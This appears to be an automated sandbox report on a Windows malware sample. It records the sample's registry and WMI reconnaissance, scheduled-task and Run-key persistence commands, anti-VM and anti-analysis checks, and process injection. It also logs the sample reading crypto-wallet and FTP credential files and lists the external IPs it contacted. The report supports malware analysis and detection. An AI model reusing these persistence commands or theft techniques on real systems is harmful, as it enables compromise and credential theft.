RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: Fontcore base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: Google Chrome base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: IE40 base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: IE4Data base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: IE5BAKEX base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: IEData base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: MobileOptionPack base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: SchedulingAgent base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: WIC base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW Jan. 5, 2024, 7:49 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x000008f4 key_handle: 0x000008f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (8 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2140 CREDAT:145409
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST

Executes one or more WMI queries which can be used to identify virtual machines (3 events)

wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_LogicalDisk WHERE DeviceID = 'C:'
wmi	SELECT * FROM Win32_PhysicalMemory

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: d3303c08f78fb96b19cfb8a9956f4a527545618f
buffer	Buffer with sha1: 2441a44b06509975255deafbaa7fd57a83a0bd41

Communicates with host for which no DNS query was performed (10 events)

host	117.18.232.200
host	185.172.128.53
host	185.215.113.68
host	193.233.132.62
host	195.20.16.103
host	20.79.30.95
host	77.91.68.21
host	5.42.65.31
host	5.42.66.0
host	91.92.254.7

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Jan. 5, 2024, 7:50 a.m.	process_identifier: 840 region_size: 335872 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000268	1	0	0
NtAllocateVirtualMemory Jan. 5, 2024, 7:50 a.m.	process_identifier: 3064 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000031c	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Jan. 5, 2024, 7:49 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

2Fy3903.exe tried to sleep 2728235 seconds, actually delayed analysis time by 2728235 seconds

Installs itself for autorun at Windows startup (11 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MaxLoonaFest131	reg_value	C:\Users\test22\AppData\Local\MaxLoonaFest131\MaxLoonaFest131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nocry.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000001001\nocry.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster131.lnk
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini
file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (11 events)

wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM Win32_PhysicalMemory
wmi	SELECT * FROM Win32_Process
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_LogicalDisk WHERE DeviceID = 'C:'

Potential code injection by writing to the memory of another process (5 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`ªÉà0âÌ @ @@K ÈÉ H.textà â `.rsrcÈÉ Êä@@.reloc®@B base_address: 0x00400000 process_identifier: 840 process_handle: 0x00000268	1	1
WriteProcessMemory Jan. 5, 2024, 7:50 a.m.	buffer: 0 base_address: 0x00450000 process_identifier: 840 process_handle: 0x00000268	1	1
WriteProcessMemory Jan. 5, 2024, 7:50 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 840 process_handle: 0x00000268	1	1
WriteProcessMemory Jan. 5, 2024, 7:50 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL£eàÐ ¸@@PHü<.text.ÎÐ `.rdata$=à>Ô@@.dataìi V@À.relocHüþh@B base_address: 0x00400000 process_identifier: 3064 process_handle: 0x0000031c	1	1
WriteProcessMemory Jan. 5, 2024, 7:50 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 3064 process_handle: 0x0000031c	1	1

Code injection by writing an executable or DLL to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`ªÉà0âÌ @ @@K ÈÉ H.textà â `.rsrcÈÉ Êä@@.reloc®@B base_address: 0x00400000 process_identifier: 840 process_handle: 0x00000268	1	1	0
WriteProcessMemory Jan. 5, 2024, 7:50 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL£eàÐ ¸@@PHü<.text.ÎÐ `.rdata$=à>Ô@@.dataìi V@À.relocHüþh@B base_address: 0x00400000 process_identifier: 3064 process_handle: 0x0000031c	1	1	0

Collects information about installed applications (50 out of 152 events)

Time & API	Arguments	Status
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Jan. 5, 2024, 7:49 a.m.	key_handle: 0x000008f8 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
